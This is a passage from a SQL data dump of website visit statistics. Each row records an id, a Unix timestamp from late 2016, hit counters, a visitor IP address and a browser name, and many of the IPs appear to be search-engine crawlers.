,(76150,1480036537,1,1,0,0,'66.102.9.27','other'),(76151,1480039115,1,1,0,0,'163.172.64.250','other'),(76152,1480042028,1,1,0,0,'163.172.64.187','other'),(76153,1480042680,1,1,0,0,'207.46.13.157','other'),(76154,1480046022,2,0,2,0,'66.249.76.13',''),(76155,1480047385,1,1,0,0,'66.249.76.13','chrome'),(76156,1480047576,1,0,1,0,'66.249.76.107',''),(76157,1480049170,1,0,1,0,'66.249.76.15',''),(76158,1480049436,1,0,1,0,'66.249.66.84',''),(76159,1480049747,5,0,5,0,'68.180.229.190',''),(76160,1480050145,1,0,1,0,'66.249.76.15',''),(76161,1480050206,1,1,0,0,'66.249.76.15','chrome'),(76162,1480050725,3,0,3,0,'68.180.229.190',''),(76163,1480050942,1,1,0,0,'66.102.9.25','other'),(76164,1480052567,1,1,0,0,'46.4.32.75','other'),(76165,1480052710,1,0,1,0,'66.249.76.109',''),(76166,1480052718,1,0,1,0,'66.249.76.15',''),(76167,1480053040,1,0,1,0,'66.249.76.108',''),(76168,1480054510,1,1,0,0,'207.46.13.157','other'),(76169,1480054995,2,0,2,0,'68.180.228.32',''),(76170,1480055390,1,1,0,0,'91.196.178.72','chrome'),(76171,1480055824,1,1,0,0,'195.154.167.219','chrome'),(76172,1480055983,1,1,0,0,'163.172.64.248','other'),(76173,1480056328,1,1,0,0,'91.196.178.72','chrome'),(76174,1480056878,1,1,0,0,'91.196.178.37','chrome'),(76175,1480057020,1,0,1,0,'68.180.228.32',''),(76176,1480058431,1,0,1,0,'68.180.229.190',''),(76177,1480059599,1,1,0,0,'46.200.164.35','chrome'),(76178,1480061050,1,1,0,0,'91.196.178.72','firefox'),(76179,1480061391,1,1,0,0,'95.134.221.166','firefox'),(76180,1480061653,1,1,0,0,'66.249.93.143','chrome'),(76181,1480062108,1,1,0,0,'91.196.178.70','firefox'),(76182,1480062189,1,1,0,0,'178.92.84.100','firefox'),(76183,1480062898,1,1,0,0,'91.196.178.69','firefox'),(76184,1480063337,1,1,0,0,'91.124.238.70','chrome'),(76185,1480064470,1,1,0,0,'37.147.238.129','firefox'),(76186,1480065860,1,1,0,0,'180.76.15.141','other'),(76187,1480067466,1,1,0,0,'94.179.73.192','firefox'),(76188,1480069015,1,1,0,0,'91.196.178.70','chrome'),(76189,1480069170,1,0,1,0,'66.249.66.81',''),(76190,1480069320,1,0,1,0,'66.249.76.14',''),(76191,1480069587,1,1,0,0,'207.46.13.157','other'),(76192,1480069914,1,0,1,0,'66.249.66.87',''),(76193,1480070367,2,2,0,0,'37.53.90.175','firefox'),(76194,1480070412,1,1,0,0,'95.134.221.166','firefox'),(76195,1480071632,1,0,1,0,'66.249.76.14',''),(76196,1480071695,1,1,0,0,'91.196.178.71','firefox'),(76197,1480071721,1,0,1,0,'66.249.76.13',''),(76198,1480072281,1,1,0,0,'95.134.221.166','firefox'),(76199,1480072293,1,1,0,0,'163.172.64.223','other'),(76200,1480073271,1,1,0,0,'109.251.248.90','chrome'),(76201,1480074890,1,0,1,0,'66.249.66.87',''),(76202,1480075006,1,1,0,0,'91.196.178.69','firefox'),(76203,1480075201,1,0,1,0,'68.180.228.32',''),(76204,1480076644,1,1,0,0,'176.241.128.112','chrome'),(76205,1480077019,1,1,0,0,'95.134.221.166','firefox'),(76206,1480077260,1,1,0,0,'91.196.178.72','chrome'),(76207,1480077787,1,1,0,0,'91.196.178.135','chrome'),(76208,1480077944,1,1,0,0,'95.134.221.166','firefox'),(76209,1480078098,1,1,0,0,'157.55.39.169','other'),(76210,1480078912,1,1,0,0,'95.134.221.166','firefox'),(76211,1480078971,1,1,0,0,'37.53.160.24','opera'),(76212,1480079979,1,0,1,0,'66.249.76.15',''),(76213,1480080542,1,1,0,0,'91.196.178.72','firefox'),(76214,1480081120,1,0,1,0,'68.180.228.32',''),(76215,1480082250,1,1,0,0,'95.134.221.166','firefox'),(76216,1480082451,1,1,0,0,'176.120.38.130','chrome'),(76217,1480082704,1,1,0,0,'178.92.248.71','chrome'),(76218,1480083301,1,1,0,0,'163.172.64.192','other'),(76219,1480083786,1,0,1,0,'66.249.76.15',''),(76220,1480083850,1,1,0,0,'95.134.221.166','firefox'),(76221,1480083853,2,0,2,0,'66.249.76.14',''),(76222,1480084416,1,1,0,0,'130.180.219.243','chrome'),(76223,1480084968,1,0,1,0,'66.249.76.14',''),(76224,1480085094,1,0,1,0,'66.249.76.15',''),(76225,1480085591,1,0,1,0,'66.249.66.84',''),(76226,1480086882,1,1,0,0,'80.91.181.190','chrome'),(76227,1480088017,1,0,1,0,'66.249.66.81',''),(76228,1480088989,1,1,0,0,'91.196.178.37','chrome'),(76229,1480089108,1,1,0,0,'62.210.148.91','chrome'),(76230,1480089135,1,1,0,0,'185.26.180.163','other'),(76231,1480090352,1,1,0,0,'46.211.252.177','chrome'),(76232,1480090357,1,0,1,0,'66.249.66.84',''),(76233,1480090361,2,0,2,0,'66.249.76.13',''),(76234,1480090459,1,1,0,0,'178.92.84.100','firefox'),(76235,1480090538,1,1,0,0,'180.76.15.33','other'),(76236,1480090905,1,0,1,0,'66.249.76.15',''),(76237,1480091110,1,0,1,0,'66.249.76.14',''),(76238,1480091980,1,1,0,0,'176.14.34.104','msie'),(76239,1480093000,1,0,1,0,'66.249.76.13',''),(76240,1480093112,1,1,0,0,'176.195.243.186','msie'),(76241,1480093133,1,0,1,0,'66.249.66.87',''),(76242,1480094512,2,0,2,0,'66.249.76.14',''),(76243,1480095318,2,0,2,0,'66.249.76.15',''),(76244,1480095483,1,1,0,0,'91.196.178.131','chrome'),(76245,1480095642,1,1,0,0,'207.46.13.157','other'),(76246,1480095746,1,0,1,0,'66.249.76.14',''),(76247,1480098260,1,1,0,0,'163.172.64.182','other'),(76248,1480098332,1,1,0,0,'66.102.9.27','chrome'),(76249,1480098419,1,0,1,0,'66.249.76.13',''),(76250,1480098460,2,0,2,0,'66.249.76.15',''),(76251,1480098624,1,0,1,0,'66.249.76.14',''),(76252,1480098778,1,1,0,0,'37.54.115.30','firefox'),(76253,1480099214,1,0,1,0,'66.249.66.177',''),(76254,1480099232,1,1,0,0,'40.77.167.48','other'),(76255,1480099513,1,1,0,0,'180.76.15.149','other'),(76256,1480099664,1,1,0,0,'82.145.220.108','other'),(76257,1480099692,1,1,0,0,'66.249.66.87','chrome'),(76258,1480101525,1,1,0,0,'163.172.64.224','other'),(76259,1480101551,1,1,0,0,'66.102.9.25','other'),(76260,1480101725,1,0,1,0,'66.249.76.109',''),(76261,1480102226,2,0,2,0,'66.249.76.15',''),(76262,1480102652,1,0,1,0,'66.249.76.14',''),(76263,1480102758,1,0,1,0,'66.249.66.84',''),(76264,1480103729,1,1,0,0,'66.249.76.109','chrome'),(76265,1480103816,1,1,0,0,'91.196.178.166','other'),(76266,1480105082,1,1,0,0,'185.26.180.26','other'),(76267,1480105168,1,1,0,0,'66.102.9.29','other'),(76268,1480105276,1,0,1,0,'66.249.66.84',''),(76269,1480106385,1,0,1,0,'66.249.76.15',''),(76270,1480106433,1,1,0,0,'207.46.13.157','other'),(76271,1480106458,2,0,2,0,'66.249.76.13',''),(76272,1480108753,1,1,0,0,'66.102.9.29','other'),(76273,1480108827,1,1,0,0,'186.202.120.146','firefox'),(76274,1480108893,1,0,1,0,'66.249.76.15',''),(76275,1480109184,1,0,1,0,'66.249.66.84',''),(76276,1480109957,1,1,0,0,'163.172.64.235','other'),(76277,1480110592,1,0,1,0,'68.180.228.32',''),(76278,1480111396,1,0,1,0,'66.249.66.84',''),(76279,1480111825,1,1,0,0,'163.172.64.254','other'),(76280,1480112356,1,1,0,0,'66.102.9.27','other'),(76281,1480113036,1,1,0,0,'130.193.50.34','other'),(76282,1480114949,1,0,1,0,'66.249.76.14',''),(76283,1480115952,1,1,0,0,'66.102.9.25','other'),(76284,1480117867,1,0,1,0,'66.249.76.14',''),(76285,1480117903,1,0,1,0,'66.249.76.109',''),(76286,1480118070,1,0,1,0,'66.249.66.81',''),(76287,1480119062,1,1,0,0,'40.77.167.48','other'),(76288,1480119282,1,1,0,0,'157.55.39.169','other'),(76289,1480119660,1,1,0,0,'66.102.9.25','other'),(76290,1480121394,1,1,0,0,'163.172.64.236','other'),(76291,1480122226,2,0,2,0,'66.249.76.15',''),(76292,1480122240,1,0,1,0,'68.180.228.32',''),(76293,1480122350,2,1,1,0,'66.249.76.14',''),(76294,1480122364,1,1,0,0,'66.249.76.109','chrome'),(76295,1480123254,1,1,0,0,'66.102.9.29','other'),(76296,1480123545,2,2,0,0,'173.234.153.122','other'),(76297,1480123594,1,1,0,0,'66.249.76.14','chrome'),(76298,1480125590,1,0,1,0,'66.249.76.108',''),(76299,1480126782,1,1,0,0,'66.102.9.25','other'),(76300,1480128638,1,1,0,0,'163.172.64.243','other'),(76301,1480128865,1,0,1,0,'66.249.76.15',''),(76302,1480129110,1,1,0,0,'163.172.64.250','other'),(76303,1480130328,1,1,0,0,'207.46.13.157','other'),(76304,1480130454,1,1,0,0,'66.102.9.29','other'),(76305,1480130523,2,0,2,0,'66.249.76.14',''),(76306,1480133541,2,0,2,0,'66.249.76.15',''),(76307,1480133599,1,0,1,0,'66.249.76.108',''),(76308,1480135572,1,1,0,0,'37.110.110.90','msie'),(76309,1480135909,1,1,0,0,'163.172.64.180','other'),(76310,1480136612,1,1,0,0,'207.46.13.157','other'),(76311,1480137195,1,1,0,0,'66.249.76.13','chrome'),(76312,1480137442,1,1,0,0,'157.55.39.169','other'),(76313,1480137568,1,0,1,0,'66.249.76.14',''),(76314,1480137645,1,0,1,0,'66.249.66.84',''),(76315,1480138260,1,1,0,0,'66.249.76.13','chrome'),(76316,1480140231,1,1,0,0,'66.102.9.25','other'),(76317,1480140310,1,0,1,0,'66.249.76.14',''),(76318,1480140684,1,1,0,0,'46.42.130.84','msie'),(76319,1480141071,1,0,1,0,'66.249.76.15',''),(76320,1480141285,1,1,0,0,'66.249.76.109','chrome'),(76321,1480141666,1,1,0,0,'95.220.126.10','msie'),(76322,1480142209,2,2,0,0,'95.213.141.126','opera'),(76323,1480142279,1,1,0,0,'163.172.64.252','other'),(76324,1480142751,10,10,0,0,'144.76.12.78','other'),(76325,1480143856,1,1,0,0,'180.76.15.157','other'),(76326,1480143932,1,0,1,0,'66.249.76.14',''),(76327,1480144282,1,0,1,0,'66.249.76.15',''),(76328,1480144291,1,0,1,0,'66.249.76.13',''),(76329,1480144735,1,1,0,0,'141.8.142.62','other'),(76330,1480144784,1,1,0,0,'163.172.64.250','other'),(76331,1480144975,1,1,0,0,'66.102.9.27','other'),(76332,1480145567,1,1,0,0,'163.172.64.182','other'),(76333,1480146804,1,1,0,0,'91.196.176.13','chrome'),(76334,1480146830,1,1,0,0,'130.193.50.34','other'),(76335,1480146933,1,0,1,0,'66.249.66.87',''),(76336,1480146951,1,1,0,0,'66.249.66.81','chrome'),(76337,1480147374,1,1,0,0,'157.55.39.169','other'),(76338,1480147719,1,0,1,0,'66.249.76.107',''),(76339,1480147796,1,1,0,0,'40.77.167.48','other'),(76340,1480148975,1,1,0,0,'37.54.19.10','chrome'),(76341,1480149878,1,1,0,0,'163.172.64.216','other'),(76342,1480150518,1,1,0,0,'178.92.84.100','firefox'),(76343,1480150885,1,1,0,0,'141.8.142.58','other'),(76344,1480150886,1,1,0,0,'141.8.142.61','other'),(76345,1480151110,1,1,0,0,'66.249.93.142','chrome'),(76346,1480152197,1,1,0,0,'157.55.39.62','other'),(76347,1480152276,1,0,1,0,'66.249.76.108',''),(76348,1480152778,1,1,0,0,'163.172.64.242','other'),(76349,1480153122,1,0,1,0,'68.180.228.32',''),(76350,1480155076,2,2,0,0,'46.4.32.75','other'),(76351,1480156413,1,1,0,0,'163.172.64.232','other'),(76352,1480156604,1,1,0,0,'128.75.225.54','msie'),(76353,1480158309,1,1,0,0,'207.46.13.157','other'),(76354,1480158824,1,1,0,0,'163.172.64.188','other'),(76355,1480159139,2,0,2,0,'66.249.64.187',''),(76356,1480159255,3,0,3,0,'66.249.64.179',''),(76357,1480159353,2,0,2,0,'66.249.64.183',''),(76358,1480159669,1,1,0,0,'163.172.64.231','other'),(76359,1480159800,1,1,0,0,'66.102.9.29','other'),(76360,1480160735,1,0,1,0,'66.249.64.187',''),(76361,1480162081,1,1,0,0,'178.92.84.100','firefox'),(76362,1480162097,1,1,0,0,'37.54.19.10','chrome'),(76363,1480162392,1,1,0,0,'87.214.180.102','firefox'),(76364,1480164037,1,1,0,0,'66.249.64.179','chrome'),(76365,1480165257,1,1,0,0,'66.249.64.183','chrome'),(76366,1480167396,1,1,0,0,'95.132.135.232','chrome'),(76367,1480168784,1,0,1,0,'66.249.64.57',''),(76368,1480169069,1,1,0,0,'207.46.13.157','other'),(76369,1480170805,1,1,0,0,'188.163.106.171','other'),(76370,1480172154,1,1,0,0,'163.172.64.228','other'),(76371,1480173232,1,1,0,0,'37.52.17.206','chrome'),(76372,1480173309,1,1,0,0,'37.54.19.10','chrome'),(76373,1480173642,1,1,0,0,'178.92.84.100','firefox'),(76374,1480173788,1,1,0,0,'66.102.9.29','other'),(76375,1480175290,101,101,0,0,'64.79.85.205','other'),(76376,1480175540,1,1,0,0,'64.79.76.50','other'),(76377,1480176924,1,1,0,0,'40.77.167.48','other'),(76378,1480179309,1,0,1,0,'66.249.64.179',''),(76379,1480180069,1,1,0,0,'179.25.188.175','firefox'),(76380,1480180619,1,1,0,0,'163.172.64.186','other'),(76381,1480181127,2,0,2,0,'66.249.64.183',''),(76382,1480181415,1,1,0,0,'66.249.64.179','chrome'),(76383,1480182780,1,1,0,0,'66.249.64.183','chrome'),(76384,1480183251,1,1,0,0,'163.172.64.182','other'),(76385,1480183431,1,1,0,0,'37.73.239.196','chrome'),(76386,1480183659,2,2,0,0,'92.222.94.100','other'),(76387,1480184227,1,1,0,0,'163.172.64.232','other'),(76388,1480184934,1,0,1,0,'66.249.64.183',''),(76389,1480185047,1,0,1,0,'66.249.64.59',''),(76390,1480185522,1,1,0,0,'66.249.64.187','chrome'),(76391,1480187890,1,0,1,0,'66.249.64.59',''),(76392,1480188571,1,1,0,0,'40.77.167.48','other'),(76393,1480189173,2,2,0,0,'195.154.167.219','chrome'),(76394,1480191030,1,1,0,0,'180.76.15.146','other'),(76395,1480192569,1,1,0,0,'163.172.64.253','other'),(76396,1480193572,1,0,1,0,'66.249.64.179',''),(76397,1480193737,1,0,1,0,'66.249.64.183',''),(76398,1480195658,2,2,0,0,'40.77.167.48','other'),(76399,1480197587,1,1,0,0,'46.211.123.149','chrome'),(76400,1480199007,1,1,0,0,'163.172.64.182','other'),(76401,1480199717,1,0,1,0,'66.249.64.187',''),(76402,1480199770,2,0,2,0,'66.249.64.183',''),(76403,1480199865,1,0,1,0,'66.249.64.59',''),(76404,1480200708,1,0,1,0,'66.249.64.187',''),(76405,1480201219,1,1,0,0,'157.55.39.169','other'),(76406,1480201495,1,1,0,0,'66.249.64.179','chrome'),(76407,1480201507,1,1,0,0,'66.249.64.57','chrome'),(76408,1480202155,1,1,0,0,'163.172.64.180','other'),(76409,1480202672,1,1,0,0,'66.102.9.27','other'),(76410,1480202951,1,0,1,0,'66.249.64.183',''),(76411,1480205257,1,0,1,0,'68.180.229.190',''),(76412,1480205570,1,0,1,0,'66.249.64.187',''),(76413,1480205888,1,1,0,0,'188.244.32.124','msie'),(76414,1480208350,1,0,1,0,'68.180.228.32',''),(76415,1480208470,1,0,1,0,'66.249.64.61',''),(76416,1480208618,1,0,1,0,'66.249.64.183',''),(76417,1480212992,1,0,1,0,'66.249.64.183',''),(76418,1480213283,3,3,0,0,'69.30.198.202','other'),(76419,1480213983,1,0,1,0,'68.180.228.32',''),(76420,1480214465,1,0,1,0,'66.249.64.187',''),(76421,1480214565,1,0,1,0,'66.249.64.179',''),(76422,1480214907,1,1,0,0,'157.55.39.169','other'),(76423,1480215912,1,0,1,0,'66.249.64.187',''),(76424,1480216777,2,1,1,0,'66.249.64.179',''),(76425,1480216833,1,0,1,0,'66.249.64.59',''),(76426,1480217159,1,1,0,0,'66.102.9.27','other'),(76427,1480217767,1,1,0,0,'157.55.39.62','other'),(76428,1480218071,1,0,1,0,'66.249.64.179',''),(76429,1480218337,1,0,1,0,'66.249.64.59',''),(76430,1480218587,1,1,0,0,'66.249.64.183','chrome'),(76431,1480218779,1,0,1,0,'66.249.64.187',''),(76432,1480219168,2,2,0,0,'195.154.167.219','chrome'),(76433,1480219625,1,0,1,0,'68.180.228.32',''),(76434,1480222756,1,1,0,0,'66.249.64.183','chrome'),(76435,1480223304,2,0,2,0,'66.249.64.179',''),(76436,1480225090,1,0,1,0,'66.249.64.183',''),(76437,1480226461,1,1,0,0,'157.55.39.206','other'),(76438,1480227351,1,0,1,0,'66.249.64.179',''),(76439,1480227418,1,1,0,0,'82.145.221.60','other'),(76440,1480227422,1,0,1,0,'66.249.64.187',''),(76441,1480231281,1,0,1,0,'66.249.64.179',''),(76442,1480231558,1,1,0,0,'66.102.9.29','other'),(76443,1480232222,1,1,0,0,'66.102.9.29','chrome'),(76444,1480234059,1,0,1,0,'66.249.64.183',''),(76445,1480235095,1,1,0,0,'91.196.178.40','firefox'),(76446,1480235573,1,0,1,0,'66.249.64.187',''),(76447,1480235695,1,1,0,0,'141.8.183.25','other'),(76448,1480235697,3,3,0,0,'130.193.50.34','other'),(76449,1480236758,1,1,0,0,'163.172.64.231','other'),(76450,1480237099,1,1,0,0,'46.46.67.141','chrome'),(76451,1480237116,1,1,0,0,'185.26.180.219','other'),(76452,1480238535,1,1,0,0,'188.163.108.200','other'),(76453,1480238857,1,0,1,0,'66.249.64.59',''),(76454,1480239178,1,1,0,0,'163.172.64.226','other'),(76455,1480239266,1,1,0,0,'180.76.15.163','other'),(76456,1480240924,1,1,0,0,'157.55.39.62','other'),(76457,1480241035,1,0,1,0,'66.249.76.14',''),(76458,1480241191,1,1,0,0,'163.172.64.217','other'),(76459,1480241275,1,1,0,0,'180.76.15.21','other'),(76460,1480243107,1,0,1,0,'66.249.76.13',''),(76461,1480243150,1,0,1,0,'66.249.66.84',''),(76462,1480243572,1,1,0,0,'37.204.156.0','chrome'),(76463,1480244882,2,0,2,0,'68.180.229.190',''),(76464,1480245394,1,1,0,0,'207.46.13.31','other'),(76465,1480246081,1,1,0,0,'66.102.9.25','other'),(76466,1480246332,1,1,0,0,'157.55.39.62','other'),(76467,1480246427,1,1,0,0,'40.77.167.48','other'),(76468,1480246577,1,0,1,0,'66.249.76.13',''),(76469,1480246828,1,1,0,0,'163.172.64.186','other'),(76470,1480248923,1,1,0,0,'62.80.163.186','firefox'),(76471,1480248934,1,1,0,0,'141.8.183.25','other'),(76472,1480249043,1,1,0,0,'78.111.185.1','chrome'),(76473,1480250004,1,0,1,0,'66.249.76.14',''),(76474,1480250100,1,0,1,0,'66.249.76.13',''),(76475,1480250262,1,1,0,0,'66.249.76.13','chrome'),(76476,1480251096,1,1,0,0,'178.92.84.100','firefox'),(76477,1480251457,1,0,1,0,'66.249.76.13',''),(76478,1480251529,1,1,0,0,'130.193.51.19','other'),(76479,1480251595,1,1,0,0,'180.76.15.149','other'),(76480,1480253002,1,0,1,0,'66.249.76.14',''),(76481,1480253146,1,1,0,0,'92.209.141.49','other'),(76482,1480253281,1,0,1,0,'66.249.76.15',''),(76483,1480253524,1,1,0,0,'163.172.64.227','other'),(76484,1480253569,1,1,0,0,'46.133.78.142','chrome'),(76485,1480254228,1,0,1,0,'66.249.76.13',''),(76486,1480254353,1,0,1,0,'66.249.76.15',''),(76487,1480254713,1,0,1,0,'66.249.76.14',''),(76488,1480254832,2,2,0,0,'66.249.76.13','chrome'),(76489,1480255299,1,1,0,0,'163.172.64.228','other'),(76490,1480255550,1,1,0,0,'163.172.64.248','other'),(76491,1480255779,1,0,1,0,'66.249.76.13',''),(76492,1480256123,1,0,1,0,'66.249.76.15',''),(76493,1480256792,1,1,0,0,'180.76.15.157','other'),(76494,1480257211,1,0,1,0,'66.249.76.109',''),(76495,1480257738,2,2,0,0,'66.249.76.14','chrome'),(76496,1480258450,1,1,0,0,'163.172.64.254','other'),(76497,1480258652,1,0,1,0,'68.180.228.32',''),(76498,1480259548,2,0,2,0,'66.249.76.15',''),(76499,1480260626,1,1,0,0,'66.102.9.25','other'),(76500,1480261298,1,0,1,0,'66.249.66.81',''),(76501,1480261316,1,0,1,0,'66.249.76.14',''),(76502,1480262785,1,1,0,0,'40.77.167.48','other'),(76503,1480263029,1,1,0,0,'66.249.76.13','chrome'),(76504,1480263561,3,3,0,0,'130.193.50.34','other'),(76505,1480263605,1,1,0,0,'141.8.183.25','other'),(76506,1480264131,1,1,0,0,'40.77.167.48','other'),(76507,1480264289,2,0,2,0,'66.249.76.15',''),(76508,1480264933,1,0,1,0,'66.249.76.109',''),(76509,1480265474,3,3,0,0,'130.193.50.34','other'),(76510,1480265499,1,1,0,0,'66.249.76.15','chrome'),(76511,1480266216,1,1,0,0,'176.195.101.102','msie'),(76512,1480266969,1,0,1,0,'66.249.76.14',''),(76513,1480267378,2,2,0,0,'130.193.50.34','other'),(76514,1480268438,1,1,0,0,'37.52.133.213','chrome'),(76515,1480268867,1,0,1,0,'66.249.66.81',''),(76516,1480269426,1,1,0,0,'163.172.64.228','other'),(76517,1480270965,1,1,0,0,'91.196.178.67','chrome'),(76518,1480271180,1,1,0,0,'78.111.189.158','chrome'),(76519,1480272533,1,1,0,0,'91.196.178.33','chrome'),(76520,1480273200,1,0,1,0,'66.249.76.13',''),(76521,1480273895,1,0,1,0,'66.249.76.14',''),(76522,1480274369,1,0,1,0,'66.249.66.81',''),(76523,1480274815,1,1,0,0,'66.102.9.29','other'),(76524,1480275596,2,0,2,0,'66.249.76.13',''),(76525,1480275732,1,0,1,0,'66.249.76.14',''),(76526,1480275798,1,1,0,0,'180.76.15.147','other'),(76527,1480275999,1,1,0,0,'37.54.115.30','firefox'),(76528,1480277943,1,0,1,0,'66.249.76.13',''),(76529,1480278402,1,1,0,0,'40.77.167.48','other'),(76530,1480278677,1,0,1,0,'66.249.76.14',''),(76531,1480281855,3,1,2,0,'66.249.76.14',''),(76532,1480281874,1,1,0,0,'66.249.76.107','chrome'),(76533,1480282373,1,1,0,0,'163.172.64.247','other'),(76534,1480285305,1,1,0,0,'141.8.142.61','other'),(76535,1480285541,1,0,1,0,'66.249.76.107',''),(76536,1480285598,1,1,0,0,'75.72.121.195','firefox'),(76537,1480285698,1,0,1,0,'66.249.76.13',''),(76538,1480285743,1,1,0,0,'163.172.64.242','other'),(76539,1480285964,1,0,1,0,'66.249.76.15',''),(76540,1480286120,1,0,1,0,'66.249.76.14',''),(76541,1480287481,1,1,0,0,'163.172.64.253','other'),(76542,1480287759,2,0,2,0,'66.249.76.15',''),(76543,1480287915,1,0,1,0,'66.249.66.81',''),(76544,1480288171,1,0,1,0,'66.249.76.108',''),(76545,1480289158,1,1,0,0,'66.102.9.29','other'),(76546,1480289916,1,0,1,0,'66.249.76.14',''),(76547,1480289939,1,0,1,0,'66.249.66.84',''),(76548,1480290388,1,1,0,0,'66.249.76.13','chrome'),(76549,1480291086,1,0,1,0,'66.249.76.15',''),(76550,1480291328,2,0,2,0,'66.249.76.14',''),(76551,1480291469,1,0,1,0,'66.249.76.13',''),(76552,1480292396,1,1,0,0,'130.193.50.34','other'),(76553,1480294766,1,1,0,0,'130.193.50.34','other'),(76554,1480296907,2,2,0,0,'163.172.64.224','other'),(76555,1480297568,1,0,1,0,'66.249.76.15',''),(76556,1480297644,1,1,0,0,'163.172.64.251','other'),(76557,1480297764,1,0,1,0,'66.249.76.108',''),(76558,1480298054,1,1,0,0,'163.172.64.184','other'),(76559,1480298311,1,0,1,0,'66.249.76.14',''),(76560,1480300331,1,0,1,0,'66.249.76.14',''),(76561,1480301068,1,0,1,0,'66.249.76.13',''),(76562,1480301356,1,1,0,0,'66.249.66.84','chrome'),(76563,1480301458,1,0,1,0,'66.249.76.15',''),(76564,1480302511,1,0,1,0,'66.249.76.14',''),(76565,1480303708,1,1,0,0,'66.102.9.27','other'),(76566,1480305853,1,1,0,0,'157.55.39.62','other'),(76567,1480309623,1,1,0,0,'163.172.64.178','other'),(76568,1480311460,1,1,0,0,'178.140.32.57','msie'),(76569,1480311484,1,1,0,0,'163.172.64.226','other'),(76570,1480313662,1,1,0,0,'66.249.64.183','chrome'),(76571,1480313991,1,0,1,0,'66.249.64.187',''),(76572,1480314240,1,0,1,0,'66.249.64.179',''),(76573,1480314601,1,1,0,0,'217.69.133.12','other'),(76574,1480315542,1,1,0,0,'163.172.64.234','other'),(76575,1480315609,1,1,0,0,'94.179.55.217','firefox'),(76576,1480315687,1,1,0,0,'66.249.93.142','chrome'),(76577,1480315986,1,1,0,0,'163.172.64.179','other'),(76578,1480317746,1,1,0,0,'95.132.35.144','chrome'),(76579,1480317980,1,1,0,0,'66.102.9.25','other'),(76580,1480318175,1,1,0,0,'163.172.64.251','other'),(76581,1480319279,1,1,0,0,'95.132.35.144','chrome'),(76582,1480319751,1,1,0,0,'40.77.167.63','other'),(76583,1480319830,1,1,0,0,'37.53.140.222','chrome'),(76584,1480320593,1,1,0,0,'91.196.176.13','chrome'),(76585,1480320607,1,1,0,0,'130.193.50.34','other'),(76586,1480321538,1,1,0,0,'163.172.64.243','other'),(76587,1480321549,1,1,0,0,'94.179.15.248','chrome'),(76588,1480321657,1,1,0,0,'37.53.226.48','firefox'),(76589,1480322116,1,1,0,0,'5.1.30.44','chrome'),(76590,1480322685,1,1,0,0,'91.196.177.15','chrome'),(76591,1480323172,1,1,0,0,'163.172.64.251','other'),(76592,1480324371,1,1,0,0,'91.196.178.68','other'),(76593,1480324613,1,1,0,0,'141.0.12.131','chrome'),(76594,1480325502,1,0,1,0,'66.249.64.187',''),(76595,1480325578,1,1,0,0,'37.53.226.48','firefox'),(76596,1480325731,1,0,1,0,'68.180.229.190',''),(76597,1480325949,1,1,0,0,'40.77.167.63','other'),(76598,1480326247,1,1,0,0,'130.180.218.28','chrome'),(76599,1480326641,1,1,0,0,'141.8.183.25','other'),(76600,1480326765,1,1,0,0,'163.172.64.254','other'),(76601,1480327164,1,1,0,0,'91.196.178.165','firefox'),(76602,1480327299,1,1,0,0,'91.196.178.68','chrome'),(76603,1480327384,1,1,0,0,'91.196.178.68','firefox'),(76604,1480328301,1,1,0,0,'130.193.51.19','other'),(76605,1480328518,1,1,0,0,'91.196.178.70','firefox'),(76606,1480328610,1,1,0,0,'163.172.64.225','other'),(76607,1480328725,1,1,0,0,'163.172.64.230','other'),(76608,1480329180,1,1,0,0,'91.196.178.164','chrome'),(76609,1480329327,1,1,0,0,'95.132.35.144','chrome'),(76610,1480330432,1,1,0,0,'37.53.226.48','firefox'),(76611,1480330575,1,0,1,0,'66.249.64.179',''),(76612,1480331127,1,1,0,0,'93.73.33.230','other'),(76613,1480331990,1,1,0,0,'91.196.178.70','firefox'),(76614,1480332247,1,1,0,0,'163.172.64.192','other'),(76615,1480332697,1,1,0,0,'66.102.9.29','other'),(76616,1480332861,1,1,0,0,'91.196.178.68','other'),(76617,1480333161,1,1,0,0,'163.172.64.254','other'),(76618,1480333758,1,1,0,0,'66.249.64.183','chrome'),(76619,1480334620,1,1,0,0,'188.244.45.43','msie'),(76620,1480334635,1,1,0,0,'178.94.42.35','chrome'),(76621,1480334838,1,1,0,0,'91.196.178.70','firefox'),(76622,1480335677,1,1,0,0,'176.195.124.239','msie'),(76623,1480335704,1,1,0,0,'163.172.64.181','other'),(76624,1480336109,1,1,0,0,'91.196.178.66','chrome'),(76625,1480336152,1,1,0,0,'37.53.226.48','firefox'),(76626,1480336574,1,1,0,0,'195.16.76.240','firefox'),(76627,1480336679,1,1,0,0,'109.173.100.12','msie'),(76628,1480337096,1,1,0,0,'31.43.36.124','other'),(76629,1480337504,1,1,0,0,'157.55.39.195','other'),(76630,1480337675,1,1,0,0,'91.196.178.37','chrome'),(76631,1480337974,1,1,0,0,'163.172.64.179','other'),(76632,1480338553,1,0,1,0,'66.249.64.183',''),(76633,1480340502,1,1,0,0,'91.196.177.26','chrome'),(76634,1480340839,1,0,1,0,'68.180.228.32',''),(76635,1480341023,1,1,0,0,'91.196.178.68','firefox'),(76636,1480341965,1,1,0,0,'37.53.226.48','firefox'),(76637,1480342485,1,1,0,0,'91.196.178.70','firefox'),(76638,1480342589,1,1,0,0,'163.172.64.227','other'),(76639,1480342673,2,2,0,0,'130.193.50.34','other'),(76640,1480342688,1,1,0,0,'130.193.51.19','other'),(76641,1480343042,1,1,0,0,'91.196.178.37','chrome'),(76642,1480343726,1,1,0,0,'37.53.227.239','chrome'),(76643,1480343934,1,1,0,0,'91.196.178.161','chrome'),(76644,1480344045,1,1,0,0,'163.172.64.181','other'),(76645,1480344142,1,1,0,0,'37.53.226.48','firefox'),(76646,1480344149,1,0,1,0,'66.249.64.179',''),(76647,1480344780,1,1,0,0,'66.249.64.187','chrome'),(76648,1480344885,1,0,1,0,'68.180.228.32',''),(76649,1480345694,2,1,1,0,'62.210.83.88',''),(76650,1480345734,1,1,0,0,'180.76.15.155','other'),(76651,1480346050,1,1,0,0,'91.196.177.46','firefox'),(76652,1480346821,1,1,0,0,'66.102.9.25','other'),(76653,1480346917,1,1,0,0,'163.172.64.227','other'),(76654,1480346927,1,1,0,0,'40.77.167.63','other'),(76655,1480347115,1,1,0,0,'37.53.226.48','firefox'),(76656,1480347493,1,1,0,0,'37.53.239.221','firefox'),(76657,1480348350,1,1,0,0,'66.249.64.187','chrome'),(76658,1480348656,1,1,0,0,'66.249.64.183','chrome'),(76659,1480349272,1,1,0,0,'130.193.51.14','other'),(76660,1480349293,1,1,0,0,'130.193.50.38','other'),(76661,1480349637,1,0,1,0,'66.249.64.187',''),(76662,1480350624,1,1,0,0,'178.209.69.173','chrome'),